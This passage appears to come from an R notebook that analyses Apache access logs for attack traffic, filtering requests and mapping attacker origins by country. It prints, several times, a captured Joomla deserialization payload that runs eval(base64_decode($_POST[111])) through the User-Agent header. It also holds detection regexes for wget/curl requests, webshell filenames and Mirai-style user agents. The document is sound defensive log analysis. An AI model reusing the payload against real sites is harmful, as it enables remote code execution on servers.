## 24675 [IPREDACTED] 2018-09-24 11:26:07 GET /myships.php HTTP/1.1
## 25611 [IPREDACTED] 2018-09-25 10:32:10 GET //myships.php HTTP/1.1
## 25612 [IPREDACTED] 2018-09-25 10:32:10 GET /myships.php HTTP/1.1
## Response.Code Response.Length HTTP.Referer
## 24017 302 214 -
## 24018 404 209 -
## 24674 302 214 -
## 24675 404 209 -
## 25611 302 214 -
## 25612 404 209 -
## User.Agent
## 24017 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24018 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24674 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24675 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25611 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25612 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## Country.Code
## 24017 CN
## 24018 CN
## 24674 CN
## 24675 CN
## 25611 CN
## 25612 CN
They do attempt to hit the file they are attempting to create.
httpd_data[grep("(JSimplepieFactory|JDatabaseDriverMysql)", httpd_data$User.Agent),]
## Raw
## 6711 [IPREDACTED] - - [04/Sep/2018:02:30:30 +0000] "GET / HTTP/1.1" 302 203 "-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## 42245 [IPREDACTED] - - [13/Oct/2018:21:52:01 +0000] "GET / HTTP/1.1" 302 203 "-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## File.Name
## 6711 access_log-20180909
## 42245 access_log-20181014
## Raw.Split
## 6711 [IPREDACTED], -, -, [04/Sep/2018:02:30:30, +0000], GET / HTTP/1.1, 302, 203, -, }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## 42245 [IPREDACTED], -, -, [13/Oct/2018:21:52:01, +0000], GET / HTTP/1.1, 302, 203, -, }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## IP.Address Date Request Response.Code
## 6711 [IPREDACTED] 2018-09-04 02:30:30 GET / HTTP/1.1 302
## 42245 [IPREDACTED] 2018-10-13 21:52:01 GET / HTTP/1.1 302
## Response.Length HTTP.Referer
## 6711 203 -
## 42245 203 -
## User.Agent
## 6711 }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## 42245 }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## Country.Code
## 6711 <NA>
## 42245 UA
Looking at this exploit it seems very similar, but maybe less complicated. Serialization exploits packaged with null character termination issues combined with SQL Injection. Attacks have definitely seemingly gotten more complicated, but not completely esoteric yet, as people are trying to both [TODO]
https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/
Building off the previous attacks, it becomes apparent that there are a few indicators of attack information such as the “User-Agent” HTTP header, URLs present in the request, attempts to trigger some form of a drop to shell (usually through PHP calls), or attempts to execute “wget” or “curl” to retrieve malware and execute it with GNU bash.
Unfortunately, all of the “wget” and “curl” based attacks were 404s when attempting to retrieve the payloads, which means that the attacker opens up the links for small periods of time. This would prove to be an interesting research endeavor to create a script that would retrieve the malware at the time it is requested to the Apache server (being absolutely careful not to execute anything as it's trying to exploit misuses of semi-colon and other delimiters), and create a pool of malware to check out the contents of.
httpd_data$User.Agent[nchar(as.character(httpd_data$User.Agent)) > 200]
## [1] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [2] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [3] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [4] "}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:4:\\\"\\\\0\\\\0\\\\0a\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:5:\\\"cache\\\";b:1;s:19:\\\"cache_name_function\\\";s:6:\\\"assert\\\";s:10:\\\"javascript\\\";i:9999;s:8:\\\"feed_url\\\";s:54:\\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\\";}i:1;s:4:\\\"init\\\";}}s:13:\\\"\\\\0\\\\0\\\\0connection\\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## [5] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [6] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [7] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [8] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
## [9] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; SE 2.X MetaSr 1.0)"
## [10] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; SE 2.X MetaSr 1.0)"
## [11] "}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:4:\\\"\\\\0\\\\0\\\\0a\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:5:\\\"cache\\\";b:1;s:19:\\\"cache_name_function\\\";s:6:\\\"assert\\\";s:10:\\\"javascript\\\";i:9999;s:8:\\\"feed_url\\\";s:54:\\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\\";}i:1;s:4:\\\"init\\\";}}s:13:\\\"\\\\0\\\\0\\\\0connection\\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## [12] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"
## [13] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"
## [14] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"
http_attack_records <- httpd_data[grep("http", httpd_data$Request),]
wget_attack_records <- httpd_data[grep("(wget|curl)", httpd_data$Request),]
php_attack_records <- httpd_data[
grep("/(shell|sheep|wshell|xshell|zuoshou|zshmindex|ceshi|she|sha)\\.php",
httpd_data$Request
),
]
ua_attack_records <- httpd_data[
grep("(LMAO|Hakai)/2.0", httpd_data$User.Agent),
]
attack_records <- rbind(
php_attack_records, wget_attack_records,
http_attack_records, ua_attack_records
)
new_attack_records <- httpd_data[
httpd_data$IP.Address %in% unique(attack_records$IP.Address),
]
new_req_attack_records <- new_attack_records[
grep("(LMAO|Hakai)/2.0", new_attack_records$Request),
]
new_ua_attack_records <- new_attack_records[
grep("(LMAO|Hakai)/2.0", new_attack_records$User.Agent),
]
g <- world_mapper(country_code_cleanup(new_attack_records$Country.Code))
g <- g + labs(
title=paste0(site_name,
": HTTPD Attack GeoIP Lookup (Overall)", collapse=""
), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(http_attack_records$Country.Code))
g <- g + labs(
title=paste0(site_name,
": HTTPD Attack GeoIP Lookup (URL present)", collapse=""
), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(wget_attack_records$Country.Code))
g <- g + labs(
title=paste0(site_name,
": HTTPD Attack GeoIP Lookup (wget/curl attempts)", collapse=""
), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(php_attack_records$Country.Code))
g <- g + labs(
title=paste0(site_name,
": HTTPD Attack GeoIP Lookup (PHP Functions)", collapse=""
), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(ua_attack_records$Country.Code))
g <- g + labs(
title=paste0(site_name,
": HTTPD Attack GeoIP Lookup (Suspicious User-Agent)", collapse=""
), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
turn_to_animation <- function(df){
df$Animate.Time <- strftime(
df$Date, format="%Y-%m-%d"
)
df$Count <- rep(0, nrow(df))
agg_df <- aggregate(
Count ~ as.factor(Animate.Time) + Country.Code,
data=df, FUN=length
)
names(agg_df) <- c("Animate.Time", "Country.Code", "Count")
agg_df$Animate.Time <- as.POSIXlt(agg_df$Animate.Time)
all_df <- data.frame(
Animate.Time=as.factor(seq(
min(agg_df$Animate.Time),
max(agg_df$Animate.Time),
24*60*60
))
)
agg_df$Animate.Time <- as.factor(agg_df$Animate.Time)
all_time_df <- merge(
all_df, agg_df, all.x=TRUE, by="Animate.Time"
)
all_time_df <- merge(all_time_df, country_code_db, all.x=TRUE)
all_time_df$Country <- all_time_df$Country.Name
all_time_df
}
g <- world_mapper(turn_to_animation(new_attack_records))
g <- g + labs(
title=paste0(site_name,
": HTTPD Attack GeoIP Lookup", collapse=""
), fill="Hits", x="", y=""
)
g <- g + geom_label(
aes(x=Inf, y=Inf, label=Animate.Time),
vjust="inward", hjust="inward",
colour="#808080", fill="#FFFFFF", label.size=0
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g <- g + transition_manual(Animate.Time)
g
g <- world_mapper(turn_to_animation(httpd_data))
g <- g + labs(
title=paste0(site_name, ": HTTPD: Hits by Country", collapse=""),
fill="Hits", x="", y=""
)
g <- g + geom_label(
aes(x=Inf, y=Inf, label=Animate.Time),
vjust="inward", hjust="inward",
colour="#808080", fill="#FFFFFF", label.size=0
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g <- g + transition_manual(Animate.Time)
g
